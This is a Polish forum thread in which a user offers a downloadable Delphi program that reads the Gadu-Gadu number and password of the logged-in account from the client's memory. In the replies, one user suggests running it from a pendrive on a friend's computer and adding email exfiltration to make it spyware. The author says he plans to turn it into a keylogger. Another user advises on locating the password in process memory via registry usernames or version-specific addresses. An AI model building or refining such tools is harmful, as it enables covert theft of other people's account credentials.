GGON Reader v.0.1 Beta

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
GGON Reader v0.1 Beta

Program napisany w delphi odczytujący numer oraz hasło Gadu-Gadu z obecnie zalogowanego numeru. Nie korzysta z pliku config.dat.
Wystarczy ,że ktoś wpisał już hasło do numeru lub jest zalogowany a ten program je odczyta.

Testowany na wersji GG 7.7

Zapraszam do testowania

Screen:
ggonrum1.jpg


<a href="http://www.adikx.yoyo.pl/GGONR.rar" target="_blank">
Download!
</a>
 

ziolo22

Użytkownik
Dołączył
Sierpień 5, 2008
Posty
16
Eeee...program działa, ale jak dla mnie on jest bezużyteczny(!!)...chyba jak ktoś się zalogował to wie jakie ma hasełko i numer
smile.gif


PS.Chyba chodziło Ci tylko, żeby ktoś kliknął na te reklamy xD Hm...takie rozwiązanie możnaby zastosować chyba w trojanie lub keyloggerze...
 

timpler

Użytkownik
Dołączył
Lipiec 28, 2008
Posty
95
Eeee...program działa, ale jak dla mnie on jest bezużyteczny(!!)...chyba jak ktoś się zalogował to wie jakie ma hasełko i numer smile.gif[/b]

No tak ale jeśli np. przychodzisz do kolegi z pendrivem a on ma włączone gg to nie będziesz mu szybko otwierał configa, kopiował hasło, wchodził na strone z dekoderem haseł GG i dekodował bo to dlugo trwa, odpalasz wtedy taik program i po sprawie. Adikx na twoim miejscu udoskonalił bym go aby wysyłał dane pocztą. Wtedy miałbyś naprawde użyteczny program. Byłby taki spyware...
 

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
Sorki ,że tak puźno odp. ale jestem na wakacjach.

Narazie chodziło mi o testy czy program napewno dobrze działa i wtedy zostanie połączony z dekoderem z config dat w formie keyloggera.

Co do uploadu to nie mam programu na penie i czekać albo wróce do domu(w czwartek) albo yoyo zacznie działać
<


PS. Thx. za zainteresowanie
<
 

bziomek

Użytkownik
Dołączył
Lipiec 14, 2008
Posty
51
Normalnie zgon xD.
Po ściągnięciu programu, kliknięciu na linki oraz wciśnięciu przycisku "Hackuj GG
<
" moim oczom ukazało się 'to':
ggontr7.png


Hahaha
<
. Leżę i kwiczę
<
.
 

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
A na jakiej wersji gg testowałeś??

Bo napisałem ,że testowałem narazie tylko na 7.7.
 

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
Testowałem na kilku 7.7 i działało.
Może masz zainstalowane jakieś dodatki w stylu StrongGG.
Zaznaczam też ,że to wersja Beta.
 

amex

Użytkownik
Dołączył
Marzec 11, 2007
Posty
934
Problem w tym że gg nawet jak jest wersja ta sam to nie koniecznie program sam w sobie jest ten sam, może być inna kompilacja, bo wiadomo, że jak poprawią jakiś szczegół to nie nadadzą jej nowego nr wersji, dlatego z tym czytaniem hasła nie zawsze może wychodzić, bo każda nawet malutka zmiana to już może być inny adres hasła w pamięci.
Radziłbym Ci zrobić na któryś z tych sposobów:

1.
w rejestrze masz nazwę ostatnio używanego usera, o ile się nie mylę w pamięci jest ona niedaleko hasła, więc możesz wziąć nazwę usera z rejestru, poszukać go w pamięci i na podstawie adresu nazwy usera wyciągnąć adres hasła... Wada jest taka, że jeśli jest zmiana w pamięci między nazwą usera a hasłem to i tak nic to nie da. W sumie to chyba nawet możesz wyciągnąć nr innego źródła, a w pamięci nr jest tuż przed hasłem o ile się nie mylę
smile.gif

2.
Sprawdzić wersje gg i na jej podstawie szukać hasła w dostosowanym do wersji adresie. Wadą jest to że musisz mieć wszystkie wersje gg, i to że jak już wspomniałem mogą być inne kompilacje (aczkolwiek info o kompilacji tez możesz uwzględnić)

najlepiej zrób jedno i drugie.


PS. dzięki za reklame
<
 

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
Poprawione wersje maja zawsze inny build. Niestety adresy pamieci w gg sa strasznie zagmatwane. Juz wczesniej planowalem sprawdzanie wersji ale obecnie nie ma mnie w domu.
sory za brak znakow polskich ale pisze z fona - plaza hej
<
 
Do góry Bottom